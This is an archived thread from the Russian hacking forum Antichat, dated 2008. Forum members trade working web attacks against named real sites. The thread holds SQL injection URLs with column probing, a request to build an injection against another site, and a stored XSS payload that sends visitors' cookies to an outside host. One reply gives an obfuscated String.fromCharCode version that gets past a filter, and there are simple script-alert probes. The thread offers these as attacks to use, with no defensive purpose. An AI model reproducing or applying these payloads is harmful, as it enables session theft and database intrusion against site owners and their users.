ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
10.04.2008, 16:26
|
|
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
Провел на форуме:
1325167
Репутация:
100
|
|
http://www.prstyle.ru/index.php?id=47+union+select+1,2,3,4/*
По какой причине вылазит:
The used SELECT statements have a different number of columns
?
Использование select имеет неправильный номер в колонке, как-то так.. |
|
|
10.04.2008, 16:27
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161
Репутация:
142
|
|
Сообщение от +toxa+
В интернете мало доков по http? Скачай себе http intruder, там есть конструктор пакетов =\
Мне живые примеры нуны для того, шоп убедиццо, шо я прально всё делаю. А запросы простенькие я могу составлять,и интрудер у меня есть ((((,
|
|
|
|
10.04.2008, 16:30
|
|
Постоянный
Регистрация: 10.11.2006
Сообщений: 416
Провел на форуме:
5636868
Репутация:
849
|
|
Ershik, там 3 колонки
http://www.prstyle.ru/index.php?id=47+order+by+4/*
http://www.prstyle.ru/index.php?id=47+order+by+3/*
|
|
|
|
10.04.2008, 16:36
|
|
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
Провел на форуме:
1325167
Репутация:
100
|
|
Точно, три колонки и xss в поиске
Спасибо, разобрался.
|
|
|
|
10.04.2008, 17:57
|
|
Участник форума
Регистрация: 25.05.2007
Сообщений: 147
Провел на форуме:
2313429
Репутация:
728
|
|
Всем прива ! У меня следующая проблема, проворачиваю активную ксс, код получился таким - <body onload=img = new Image(); img.src = "http://s.netsec.ru/xxx.gif?"+document.cookie;>
Но символ / фильтруется, вернее даже не фильтруется, а все, что идет после него, обрубается, включая символ, можно ли что нибудь при таком раскладе сделать ?
|
|
|
|
10.04.2008, 18:29
|
|
Reservists Of Antichat - Level 6
Регистрация: 25.03.2008
Сообщений: 670
Провел на форуме:
4137635
Репутация:
2407
|
|
Можно строку "http://s.netsec.ru/xxx.gif?" зашифровать в ASCII-коды, а потом яваскриптом расшифровывать с помощью String.fromCharCode();
Например:
Код:
String.fromCharCode(104,116,116,112,58,47, 47,115,46,110,101,116, 115,101,99,46,114,117,47, 120,120,120,46,103,105,102,63);
//это вернёт строку http://s.netsec.ru/xxx.gif?
А финальный вариант без ошибок примерно такой:
Код:
<body onload="javascript:img = new Image(); img.src = String.fromCharCode(104,116,116,112,58,47, 47,115,46,110,101,116, 115,101,99,46,114,117,47, 120,120,120,46,103,105,102,63);+document.cookie;">
Последний раз редактировалось d_x; 10.04.2008 в 18:35..
|
|
|
|
10.04.2008, 22:50
|
|
Участник форума
Регистрация: 08.10.2007
Сообщений: 259
Провел на форуме:
500748
Репутация:
137
|
|
пожайлусто помогите разработать sql иньекцию
http://www.prodai.user.kz/index.php?id=68296&fid=5'
|
|
|
|
10.04.2008, 23:01
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161
Репутация:
142
|
|
"><script>alert()</script>
Вопрос: Почему при передаче символов с двойными и одинарными кавычками не срабатывает ? А с передачей чисел пашет
|
|
|
|
10.04.2008, 23:04
|
|
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
Провел на форуме:
8042357
Репутация:
3742
|
|
"><script>alert(/blablabla/)</script>
кавычки не срабатывают изза magic_quotes или чегониб типа addslashes()
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
|
|
|
|
10.04.2008, 23:04
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161
Репутация:
142
|
|
Сообщение от ZET36
пожайлусто помогите разработать sql иньекцию
http://www.prodai.user.kz/index.php?id=68296&fid=5'
Больше на раскрытие пути похоже:Р
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
